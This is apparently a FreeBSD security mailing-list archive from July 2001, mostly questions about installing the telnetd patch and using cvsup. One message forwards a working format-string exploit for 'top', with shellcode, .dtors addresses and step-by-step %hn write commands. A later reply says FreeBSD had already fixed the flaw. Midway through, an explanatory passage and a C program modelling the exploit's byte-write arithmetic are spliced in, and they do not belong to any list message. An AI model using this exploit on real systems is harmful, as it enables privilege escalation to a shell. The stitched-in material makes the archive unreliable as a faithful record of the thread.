|+++ libexec/telnetd/ext.h	2001/07/23 22:00:51	1.10
--------------------------
File to patch:

> -----Original Message-----
> From: Peter Pentchev [mailto:roam@orbitel.bg]
> Sent: Wednesday, July 25, 2001 9:53 AM
> To: Chuck Rock
> Cc: security@FreeBSD.ORG
> Subject: Re: I'm having problems getting this patch installed....
>
>
> On Wed, Jul 25, 2001 at 09:31:09AM -0500, Chuck Rock wrote:
> > Below is some E-mail from someone who is trying to help me. I'm having
> > problems installing the telnetd patch on my FreeBSD 4.2 release box.
>
> Can you try running 'patch -p0 < /path/to/patch' instead of just '-p'?
>
> G'luck,
> Peter
>
> --
> This sentence no verb.
>

From owner-freebsd-security Wed Jul 25 8:50:51 2001 Delivered-To: freebsd-security@freebsd.org Received: from web.metropark.com (unknown [209.248.134.200]) by hub.freebsd.org (Postfix) with ESMTP id 60E5037B409 for ; Wed, 25 Jul 2001 08:50:13 -0700 (PDT) (envelope-from bob@metropark.com) Received: from bob (users.metropark.com [209.248.134.245]) by web.metropark.com (8.11.1/8.11.1) with SMTP id f6NJ7Bw20182 for ; Mon, 23 Jul 2001 14:07:12 -0500 (CDT) (envelope-from bob@metropark.com) Message-ID: <033901c113aa$c65aebe0$6c01a8c0@mpcsecurity.com> From: "Robert Herrold" To: Subject: telnet Exploit Date: Mon, 23 Jul 2001 14:07:48 -0500 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0332_01C11380.DA60C080" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MIMEOLE: Produced By Microsoft MimeOLE
V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

I have never used cvsup before, and I'm a little confused about the current possible patch/fix.

First off, is there a 'patch/fix/replacement for telnetd' (/usr/libexec/telnetd). If so, would that be included in the cvsup?

Secondly, I've read through the cvsup documentation, and I'm a little unclear on whether it is basically just downloading source, or is it adding the packages. (do I need to recompile?)

Any help would be greatly appreciated.

Bob Herrold
Senior Network Engineer
Metropark Communications
10405 A Baur Blvd
St Louis MO 63132
(314)439-1900
From owner-freebsd-security Wed Jul 25 9:13:28 2001 Delivered-To: freebsd-security@freebsd.org Received: from uj.pfi.lt (uj.pfi.lt [193.219.52.129]) by hub.freebsd.org (Postfix) with ESMTP id 4216937B41B for ; Wed, 25 Jul 2001 09:12:03 -0700 (PDT) (envelope-from tomas@megalogika.lt) Received: from tyras (megalogika.stp.lt [193.219.52.197]) by uj.pfi.lt (8.11.2/8.11.2) with SMTP id f6PFjOX01749 for ; Wed, 25 Jul 2001 17:45:26 +0200 From: "Tomas Verbaitis" To: Subject: FW (BUGTRAQ): top format string bug exploit code (exploitable) Date: Wed, 25 Jul 2001 18:11:13 +0200 Message-ID: <000801c11524$6d042a40$0601a9c0@tyras> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-4" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

ahoj!

is this somehow addressed at the moment? any suggestions for workarounds?

ve

-----Original Message-----
From: SeungHyun Seo [mailto:s1980914@inhavision.inha.ac.kr]
Sent: Wednesday, July 25, 2001 12:24 PM
To: bugtraq@securityfocus.com
Subject: top format string bug exploit code (exploitable)

hi.

It still seems to be affected under 3.5beta9 (including this version). Someone said it's not an exploitable vulnerability about 8 months ago, but it's possible to exploit, though the situation is difficult. The following code and some procedure comments demonstrate it. It is possible to get kmem privilege on the XXXXBSD which is still not patched, and possible to get root privilege on Solaris.
(You have to guess the return address on Solaris, because the 0x08040000 .text region causes a segfault.) I didn't test it on all other systems... so check your systems now and, if possible, patch!

/*
 * freebsd x86 top exploit
 * affected under top-3.5beta9 ( including this version )
 *
 * 1. get the address of .dtors from /usr/bin/top using objdump ,
 *
 *    'objdump -s -j .dtors /usr/bin/top'
 *
 * 2. divide it into four parts, and set it up into an environment variable like "XSEO="
 *
 * 3. run top, then find "your parted addresses from "kill" or "renice" command like this
 *
 *    'k %200$p' or 'r 2000 %200$p'
 *
 * 4. do exploit !
 *
 *    'k %190u%230$hn'   <== 0xbf (4)
 *    'k %190u%229$hn'   <== 0xbf (3)
 *    'k %214u%228$hn'   <== 0xd7 (2)
 *    'k %118u%227$hn'   <== 0x77 (1)
 *
 * truefinder , seo@igrus.inha.ac.kr
 * thx mat, labman, zen-parse
 *
 */
#include <stdio.h>
#include <stdlib.h>     /* putenv(), system(); header names restored, the archive had stripped them */
#include <string.h>     /* memset(), memcpy(), strlen() */

#define NOP     0x90
#define BUFSIZE 2048

char fmt[]= "XSEO="
/* you would meet above things from 'k %200$p', it's confirming strings*/
"SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
/* .dtors's address in BSD*/
"\x08\xff\x04\x08"
"\x09\xff\x04\x08"
"\x0a\xff\x04\x08"
"\x0b\xff\x04\x08"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";

/* might shellcode be located 0xbfbfd6? ~ 0xbfbfde? */
char sc[]=
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
"\x62\x69\x6e\x89\xe3\x50\x53\x50\x54\x53"
"\xb0\x3b\x50\xcd\x80";    /* bigwaks 23 bytes shellcode */

int main(void)
{
    char scbuf[BUFSIZE];
    char *scp;

    scp = (char*)scbuf;
    memset( scbuf, NOP, BUFSIZE );             /* NOP sled fills the buffer */
    scp += ( BUFSIZE - strlen(sc) - 1);
    memcpy( scp, sc ,strlen(sc));              /* shellcode at the end of the sled */
    scbuf[ BUFSIZE - 1] = '\0';
    memcpy( scbuf, "EGG=", 4);                 /* exported as the EGG environment variable */

    putenv(fmt);
    putenv(scbuf);
    system("/bin/bash");                       /* run top from this shell, then type the 'k' commands */
    return 0;
}

++ Seo SeungHyun, Inha University Group of Research for Unix Security IGRUS / khdp.org , Host / Network Security Laboratory, 4-207 [e-mail] seo@igrus.inha.ac.kr , [Office] +82-32-860-8676 ( ROK )

From owner-freebsd-security Wed Jul 25 10:43:18 2001 Delivered-To: freebsd-security@freebsd.org Received: from uakron.edu (uakron.edu [130.101.5.4]) by hub.freebsd.org (Postfix) with ESMTP id E359637B405 for ; Wed, 25 Jul 2001 10:43:11 -0700 (PDT) (envelope-from dowdell@uakron.edu) Received: from uakron.edu ([130.101.90.200]) by uakron.edu (8.11.2/8.11.2) with ESMTP id f6PHhAh26997 for ; Wed, 25 Jul 2001 13:43:10 -0400 (EDT) Message-ID: <3B5F0538.3BD89B86@uakron.edu> Date: Wed, 25 Jul 2001 13:43:20 -0400 From: Michael Dowdell Organization: University of Akron X-Mailer: Mozilla 4.76 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 To: security@FreeBSD.ORG Subject: Re: I'm having problems getting this patch installed.... References: <005e01c1151d$d37f1340$1805010a@epconline.net> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

is your problem with the patch or the compile? i have 4.2 release and get the following make errors for make all after applying the patch. haven't figured this out yet...
cc -O -pipe -DLINEMODE -DUSE_TERMIO -DDIAGNOSTICS -DOLD_ENVIRON -DENV_HACK -DAUTHENTICATION -DENCRYPTION -I/usr/src/secure/libexec/telnetd/../../../crypto/telnet -DINET6 -DNO_IDEA -o telnetd global.o slc.o state.o sys_term.o telnetd.o termstat.o utility.o authenc.o -lutil -ltermcap -L/usr/src/secure/libexec/telnetd/../../lib/libtelnet -ltelnet -lcrypto -lcrypt -lmp
/usr/lib/libtelnet.a(kerberos.o): In function `kerberos4_init':
kerberos.o(.text+0x114): undefined reference to `krb_get_default_keyfile'
/usr/lib/libtelnet.a(kerberos.o): In function `kerberos4_send':
kerberos.o(.text+0x1a6): undefined reference to `krb_get_phost'
kerberos.o(.text+0x1e3): undefined reference to `krb_realmofhost'
kerberos.o(.text+0x21a): undefined reference to `krb_mk_req'
kerberos.o(.text+0x22b): undefined reference to `krb_err_txt'
kerberos.o(.text+0x24d): undefined reference to `krb_get_cred'
kerberos.o(.text+0x25e): undefined reference to `krb_err_txt'
/usr/lib/libtelnet.a(kerberos.o): In function `kerberos4_is':
kerberos.o(.text+0x456): undefined reference to `krb_get_lrealm'
kerberos.o(.text+0x53c): undefined reference to `krb_rd_req'
kerberos.o(.text+0x56c): undefined reference to `krb_err_txt'
kerberos.o(.text+0x5a2): undefined reference to `krb_kntoln'
kerberos.o(.text+0x5c1): undefined reference to `kuserok'
/usr/lib/libtelnet.a(kerberos.o): In function `kerberos4_status':
kerberos.o(.text+0x89e): undefined reference to `kuserok'
*** Error code 1

Stop in /usr/src/secure/libexec/telnetd.

--
thanks,

just mike

Upgrade n. A painful crisis which belatedly restores one's faith
in the previous system.
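Step 4 of the top exploit forwarded earlier in this thread is the part worth understanding: four separate "k %<width>u%<pos>$hn" commands each store a 16-bit character count at one of four consecutive .dtors bytes, and the widths 118, 214, 190, 190 are chosen so that the low byte of each count is one byte of the shellcode address 0xbfbfd777. The following C program is an added example, not part of the original post or of the exploit; it models exactly that arithmetic on a local byte array, giving each %hn a real pointer so nothing is corrupted. It assumes x86-style little-endian 2-byte stores and a fixed "baseline" of characters that the victim prints before the attacker-controlled part of the format string (one character reproduces the exploit's widths); both are assumptions, not facts from the post.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/*
 * Added example (not from the original post): safe model of step 4 of the
 * top exploit, four overlapping %hn stores building a 32-bit value.
 * Assumptions: little-endian 2-byte stores (x86) and a fixed per-command
 * baseline of characters printed before the user-controlled format text.
 */

/* Width w for "%<w>u" so that baseline + w == byte (mod 256).
 * "%0u" still prints one digit, so a computed width of 0 becomes 256. */
static unsigned width_for_byte(unsigned baseline, unsigned char byte)
{
    unsigned w = (256u + byte - (baseline % 256u)) % 256u;
    return w == 0 ? 256u : w;
}

/* widths[i] makes the i-th little-endian byte of value land at mem[i]. */
void plan_widths(unsigned baseline, uint32_t value, unsigned widths[4])
{
    for (int i = 0; i < 4; i++)
        widths[i] = width_for_byte(baseline, (unsigned char)(value >> (8 * i)));
}

/*
 * One format string per write, as the exploit issues one "k ..." command
 * per byte.  %hn stores the character count so far as a 16-bit value; the
 * store is emulated at mem[i], mem[i+1], so mem must have room for 5 bytes.
 * Writes go from the lowest address up: each store's high byte (0 for
 * counts below 256) spills into the next byte, which the following write
 * then overwrites with its intended value.  "%*s" supplies the baseline.
 */
void overlapping_hn_writes(unsigned baseline, const unsigned widths[4],
                           unsigned char mem[5])
{
    char buf[1024];
    for (int i = 0; i < 4; i++) {
        short count = 0;
        snprintf(buf, sizeof buf, "%*s%*u%hn",
                 (int)baseline, "", (int)widths[i], 0u, &count);
        mem[i]     = (unsigned char)(count & 0xff);         /* low byte  */
        mem[i + 1] = (unsigned char)((count >> 8) & 0xff);  /* high byte */
    }
}

/* Reassemble the four target bytes as the 32-bit value the CPU would see. */
uint32_t read_le32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Plan and perform the four writes; returns what now sits at mem[0..3]. */
uint32_t write_u32_via_hn(unsigned baseline, uint32_t target)
{
    unsigned widths[4];
    unsigned char mem[5] = {0};
    plan_widths(baseline, target, widths);
    overlapping_hn_writes(baseline, widths, mem);
    return read_le32(mem);
}

int main(void)
{
    /* 0xbfbfd777 is the address the exploit's four commands encode (bytes
     * 0x77, 0xd7, 0xbf, 0xbf); with a 1-character baseline the plan
     * reproduces its widths 118, 214, 190, 190 for positions 227..230. */
    unsigned widths[4];
    plan_widths(1, 0xbfbfd777u, widths);
    for (int i = 0; i < 4; i++)
        printf("byte %d: 'k %%%uu%%%u$hn'\n", i, widths[i], 227u + i);
    printf("result: 0x%08x\n", write_u32_via_hn(1, 0xbfbfd777u));
    return 0;
}
```

The practical lesson is in overlapping_hn_writes: because each %hn stores two bytes, the four one-byte writes must be issued from the lowest address upward, and the last one leaves a stray zero byte after the target, which an attacker has to be able to tolerate.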
From owner-freebsd-security Wed Jul 25 10:59:46 2001 Delivered-To: freebsd-security@freebsd.org Received: from kira.epconline.net (kira2.epconline.net [209.83.132.2]) by hub.freebsd.org (Postfix) with ESMTP id 0A0BA37B407 for ; Wed, 25 Jul 2001 10:59:36 -0700 (PDT) (envelope-from carock@epconline.net) Received: from therock (betterguard.epconline.net [207.206.185.193]) by kira.epconline.net (8.11.4/8.11.4) with SMTP id f6PHxZP58050 for ; Wed, 25 Jul 2001 12:59:35 -0500 (CDT) From: "Chuck Rock" To: Subject: RE: I'm having problems getting this patch installed.... Date: Wed, 25 Jul 2001 12:59:35 -0500 Message-ID: <006d01c11533$90452310$1805010a@epconline.net> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 In-Reply-To: <3B5F0538.3BD89B86@uakron.edu> Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

I haven't gotten that far. I'm on line 2 in the SA-01:49 "how to install this patch" procedure.

It's asking me a question I don't know how to answer.

On your problem, is that from the make depend, or make install?

Chuck

> -----Original Message-----
> From: owner-freebsd-security@FreeBSD.ORG
> [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Michael Dowdell
> Sent: Wednesday, July 25, 2001 12:43 PM
> To: security@FreeBSD.ORG
> Subject: Re: I'm having problems getting this patch installed....
>
>
> is your problem with the patch or the compile? i have 4.2 release and
> get the following make errors for make all after applying the patch.
> haven't figured this out yet...
> > > cc -O -pipe -DLINEMODE -DUSE_TERMIO -DDIAGNOSTICS -DOLD_ENVIRON > -DENV_HACK -DAUTHENTICATION -DENCRYPTION > -I/usr/src/secure/libexec/telnetd/../../../crypto/telnet -DINET6 > -DNO_IDEA -o telnetd global.o slc.o state.o sys_term.o telnetd.o > termstat.o utility.o authenc.o -lutil -ltermcap > -L/usr/src/secure/libexec/telnetd/../../lib/libtelnet -ltelnet -lcrypto > -lcrypt -lmp > /usr/lib/libtelnet.a(kerberos.o): In function `kerberos4_init': > kerberos.o(.text+0x114): undefined reference to > `krb_get_default_keyfile' > /usr/lib/libtelnet.a(kerberos.o): In function `kerberos4_send': > kerberos.o(.text+0x1a6): undefined reference to `krb_get_phost' > kerberos.o(.text+0x1e3): undefined reference to `krb_realmofhost' > kerberos.o(.text+0x21a): undefined reference to `krb_mk_req' > kerberos.o(.text+0x22b): undefined reference to `krb_err_txt' > kerberos.o(.text+0x24d): undefined reference to `krb_get_cred' > kerberos.o(.text+0x25e): undefined reference to `krb_err_txt' > /usr/lib/libtelnet.a(kerberos.o): In function `kerberos4_is': > kerberos.o(.text+0x456): undefined reference to `krb_get_lrealm' > kerberos.o(.text+0x53c): undefined reference to `krb_rd_req' > kerberos.o(.text+0x56c): undefined reference to `krb_err_txt' > kerberos.o(.text+0x5a2): undefined reference to `krb_kntoln' > kerberos.o(.text+0x5c1): undefined reference to `kuserok' > /usr/lib/libtelnet.a(kerberos.o): In function `kerberos4_status': > kerberos.o(.text+0x89e): undefined reference to `kuserok' > *** Error code 1 > > Stop in /usr/src/secure/libexec/telnetd. > > > -- > thanks, > > just mike > > Upgrade n. A painful crisis which belatedly restores one's faith > in the previous system. 
>

From owner-freebsd-security Wed Jul 25 11: 6:19 2001 Delivered-To: freebsd-security@freebsd.org Received: from pogo.caustic.org (pogo.caustic.org [208.44.193.69]) by hub.freebsd.org (Postfix) with ESMTP id 5E3F637B403 for ; Wed, 25 Jul 2001 11:06:09 -0700 (PDT) (envelope-from jan@caustic.org) Received: from localhost (jan@localhost) by pogo.caustic.org (8.11.0/ignatz) with ESMTP id f6PI5vp65855; Wed, 25 Jul 2001 11:05:57 -0700 (PDT) Date: Wed, 25 Jul 2001 11:05:57 -0700 (PDT) From: "f.johan.beisser" To: Robert Herrold Cc: freebsd-security@FreeBSD.ORG Subject: Re: telnet Exploit In-Reply-To: <033901c113aa$c65aebe0$6c01a8c0@mpcsecurity.com> Message-ID: X-Ignore: This statement isn't supposed to be read by you MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

On Mon, 23 Jul 2001, Robert Herrold wrote:

> I have never used cvsup before, and I'm a little confused about the
> current possible patch/fix.
>
> First off, is there a 'patch/fix/replacement for telnetd'
> (/usr/libexec/telnetd). If so, would that be included in the cvsup?

yes.

> Secondly, I've read through the cvsup documentation, and I'm a little
> unclear on whether it is basically just downloading source, or is it
> adding the packages. (do I need to recompile?)

it's downloading source. lots of it. this can take a while.

yes, you'll have to recompile.

> Any help would be greatly appreciated.

hope this helps some.

-------/ f. johan beisser /--------------------------------------+
 http://caustic.org/~jan                          jan@caustic.org
          "if my thought-dreams could be seen..
           they'd probably put my head in a guillotine" -- Bob Dylan

From owner-freebsd-security Wed Jul 25 13:44:59 2001 Delivered-To: freebsd-security@freebsd.org Received: from uakron.edu (uakron.edu [130.101.5.4]) by hub.freebsd.org (Postfix) with ESMTP id D66BB37B405 for ; Wed, 25 Jul 2001 13:44:53 -0700 (PDT) (envelope-from dowdell@uakron.edu) Received: from uakron.edu ([130.101.90.200]) by uakron.edu (8.11.2/8.11.2) with ESMTP id f6PKiqh14367 for ; Wed, 25 Jul 2001 16:44:53 -0400 (EDT) Message-ID: <3B5F2FCF.304510D5@uakron.edu> Date: Wed, 25 Jul 2001 16:45:03 -0400 From: Michael Dowdell Organization: University of Akron X-Mailer: Mozilla 4.76 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 To: security@FreeBSD.ORG Subject: Re: I'm having problems getting this patch installed.... References: <006d01c11533$90452310$1805010a@epconline.net> Content-Type: multipart/mixed; boundary="------------85BE5A53EECC7C62E400EE8D" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

i get these errors on 'make all'. applying the patch went smoothly. if i remember correctly, i had the same problem you seem to be having while applying a patch for ?file globbing with ftpd? and never did figure it out. after setting it aside for a bit and starting the whole process fresh, everything worked exactly as given.

Chuck Rock wrote:
>
> I haven't gotten that far. I'm on line 2 in the SA-01:49 "how to install
> this patch" procedure.
>
> It's asking me a question I don't know how to answer.
>
> On your problem, is that from the make depend, or make install?
> > Chuck > > > -----Original Message----- > > From: owner-freebsd-security@FreeBSD.ORG > > [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Michael Dowdell > > Sent: Wednesday, July 25, 2001 12:43 PM > > To: security@FreeBSD.ORG > > Subject: Re: I'm having problems getting this patch installed.... > > > > > > is your problem with the patch or the compile? i have 4.2 release and > > get the following make errors for make all after applying the patch. > > haven't figured this out yet... > > > > > > cc -O -pipe -DLINEMODE -DUSE_TERMIO -DDIAGNOSTICS -DOLD_ENVIRON > > -DENV_HACK -DAUTHENTICATION -DENCRYPTION > > -I/usr/src/secure/libexec/telnetd/../../../crypto/telnet -DINET6 > > -DNO_IDEA -o telnetd global.o slc.o state.o sys_term.o telnetd.o > > termstat.o utility.o authenc.o -lutil -ltermcap > > -L/usr/src/secure/libexec/telnetd/../../lib/libtelnet -ltelnet -lcrypto > > -lcrypt -lmp > > /usr/lib/libtelnet.a(kerberos.o): In function `kerberos4_init': > > kerberos.o(.text+0x114): undefined reference to > > `krb_get_default_keyfile' > > /usr/lib/libtelnet.a(kerberos.o): In function `kerberos4_send': > > kerberos.o(.text+0x1a6): undefined reference to `krb_get_phost' > > kerberos.o(.text+0x1e3): undefined reference to `krb_realmofhost' > > kerberos.o(.text+0x21a): undefined reference to `krb_mk_req' > > kerberos.o(.text+0x22b): undefined reference to `krb_err_txt' > > kerberos.o(.text+0x24d): undefined reference to `krb_get_cred' > > kerberos.o(.text+0x25e): undefined reference to `krb_err_txt' > > /usr/lib/libtelnet.a(kerberos.o): In function `kerberos4_is': > > kerberos.o(.text+0x456): undefined reference to `krb_get_lrealm' > > kerberos.o(.text+0x53c): undefined reference to `krb_rd_req' > > kerberos.o(.text+0x56c): undefined reference to `krb_err_txt' > > kerberos.o(.text+0x5a2): undefined reference to `krb_kntoln' > > kerberos.o(.text+0x5c1): undefined reference to `kuserok' > > /usr/lib/libtelnet.a(kerberos.o): In function `kerberos4_status': > > 
kerberos.o(.text+0x89e): undefined reference to `kuserok'
> > *** Error code 1
> >
> > Stop in /usr/src/secure/libexec/telnetd.
> >
> >
> > --
> > thanks,
> >
> > just mike
> >
> > Upgrade n. A painful crisis which belatedly restores one's faith
> > in the previous system.
> >

--
thanks,

just mike

Upgrade n. A painful crisis which belatedly restores one's faith
in the previous system.

From owner-freebsd-security Wed Jul 25 13:57:12 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-64-169-104-149.dsl.lsan03.pacbell.net [64.169.104.149]) by hub.freebsd.org (Postfix) with ESMTP id 55A8A37B426 for ; Wed, 25 Jul 2001 13:56:33 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id DA06866E04; Wed, 25 Jul 2001 13:56:32 -0700 (PDT) Date: Wed, 25 Jul 2001 13:56:32 -0700 From: Kris Kennaway To: Michael Dowdell Cc: security@FreeBSD.ORG Subject: Re: I'm
having problems getting this patch installed.... Message-ID: <20010725135632.C57915@xor.obsecurity.org> References: <005e01c1151d$d37f1340$1805010a@epconline.net> <3B5F0538.3BD89B86@uakron.edu> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="nmemrqcdn5VTmUEE" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3B5F0538.3BD89B86@uakron.edu>; from dowdell@uakron.edu on Wed, Jul 25, 2001 at 01:43:20PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

On Wed, Jul 25, 2001 at 01:43:20PM -0400, Michael Dowdell wrote:
> is your problem with the patch or the compile? i have 4.2 release and
> get the following make errors for make all after applying the patch.
> haven't figured this out yet...

Try rebuilding libtelnet first in secure/lib/libtelnet.
Kris

From owner-freebsd-security Wed Jul 25 13:58:33 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-64-169-104-149.dsl.lsan03.pacbell.net [64.169.104.149]) by hub.freebsd.org (Postfix) with ESMTP id ED57437B401 for ; Wed, 25 Jul 2001 13:58:23 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 31B7966E04; Wed, 25 Jul 2001 13:58:23 -0700 (PDT) Date: Wed, 25 Jul 2001 13:58:22 -0700 From: Kris Kennaway To: security@FreeBSD.org Subject: [venglin@freebsd.lublin.pl: Re: top format string bug exploit code (exploitable)] Message-ID: <20010725135822.D57915@xor.obsecurity.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="mJm6k4Vb/yFcL9ZU" Content-Disposition: inline User-Agent: Mutt/1.2.5i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

To the person who asked about current exploitability of this.
Kris

----- Forwarded message from Przemyslaw Frasunek -----

Delivered-To: kkenn@localhost.obsecurity.org Delivered-To: kris@freebsd.org Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm Precedence: bulk List-Id: List-Post: List-Help: List-Unsubscribe: List-Subscribe: Delivered-To: mailing list bugtraq@securityfocus.com Delivered-To: moderator for bugtraq@securityfocus.com From: "Przemyslaw Frasunek" To: "SeungHyun Seo" , Subject: Re: top format string bug exploit code (exploitable) Date: Wed, 25 Jul 2001 18:15:15 +0200 Organization: babcia padlina ltd. X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 X-UIDL: f70f3afb4816a63ef72be9f0b9bd764f

> It still seems to be affected under 3.5beta9 (including this version)
> someone said it's not the problem of exploitable vulnerability about 8 month ago ,

FreeBSD is not affected. The problem was fixed 9 months ago and an advisory was issued. See:

ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-00:62.top.v1.1.asc

--
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
* Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF *

----- End forwarded message -----

From owner-freebsd-security Wed Jul 25 14: 4:38 2001 Delivered-To: freebsd-security@freebsd.org Received: from titan.titan-project.org (titan.titan-project.org [216.127.78.20]) by hub.freebsd.org (Postfix) with ESMTP id 7B1D137B406 for ; Wed, 25 Jul 2001 14:04:35 -0700 (PDT) (envelope-from cshumway@titan-project.org) Received: from localhost (cshumway@localhost [127.0.0.1]) by titan.titan-project.org (8.11.4/8.11.4) with ESMTP id f6PL3KQ76276; Wed, 25 Jul 2001 14:03:20 -0700 (PDT) (envelope-from cshumway@titan-project.org) Date: Wed, 25 Jul 2001 14:03:20 -0700 (PDT) From: Christopher Shumway To: Robert Herrold Cc: Subject: Re: telnet Exploit In-Reply-To: <033901c113aa$c65aebe0$6c01a8c0@mpcsecurity.com> Message-ID: <20010725135931.F75545-100000@titan.titan-project.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

On Mon, 23 Jul 2001, Robert Herrold wrote:

> I have never used cvsup before, and I'm a little confused about the
> current possible patch/fix.
>
> First off, is there a 'patch/fix/replacement for telnetd'
> (/usr/libexec/telnetd).

Yes.

> If so, would that be included in the cvsup?
As long as you're CVSupping the source code distribution that contains telnetd's source code, then yes, you're getting pretty much what the patch for telnetd contains.

> Secondly, I've read through the cvsup documentation, and I'm a little
> unclear on whether it is basically just downloading source, or is it
> adding the packages. (do I need to recompile?)

CVSup updates your local source code repository with that on the CVSup server you are using. It does not install binaries anywhere on the system. So, yes, you will have to recompile telnetd after cvsupping.

---
Christopher Shumway
cshumway@titan-project.org
cshumway@freebsd.org

From owner-freebsd-security Wed Jul 25 14:29:56 2001 Delivered-To: freebsd-security@freebsd.org Received: from wasabi.sushigoth.com (dsl081-059-169.sfo1.dsl.speakeasy.net [64.81.59.169]) by hub.freebsd.org (Postfix) with ESMTP id 6380737B401 for ; Wed, 25 Jul 2001 14:29:54 -0700 (PDT) (envelope-from bob@antepenultimate.org) Received: from localhost (robert@localhost) by wasabi.sushigoth.com (8.11.1/8.11.1) with ESMTP id f6PLNZW05258 for ; Wed, 25 Jul 2001 14:23:35 -0700 (PDT) Date: Wed, 25 Jul 2001 14:23:35 -0700 (PDT) From: bob X-X-Sender: To: FreeBSD Security Subject: Telnet exploit & 3.4-RELEASE Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

What is the best way for me to secure my 3.4-Release machine from the recent telnetd exploit?

I don't have physical access to the machine (it's on the other coast) and I don't have any of the cvsup packages installed. The packages and ports seem to be unavailable for this release. I'd like to just upgrade through source, but I'm not sure how to get the necessary packages.
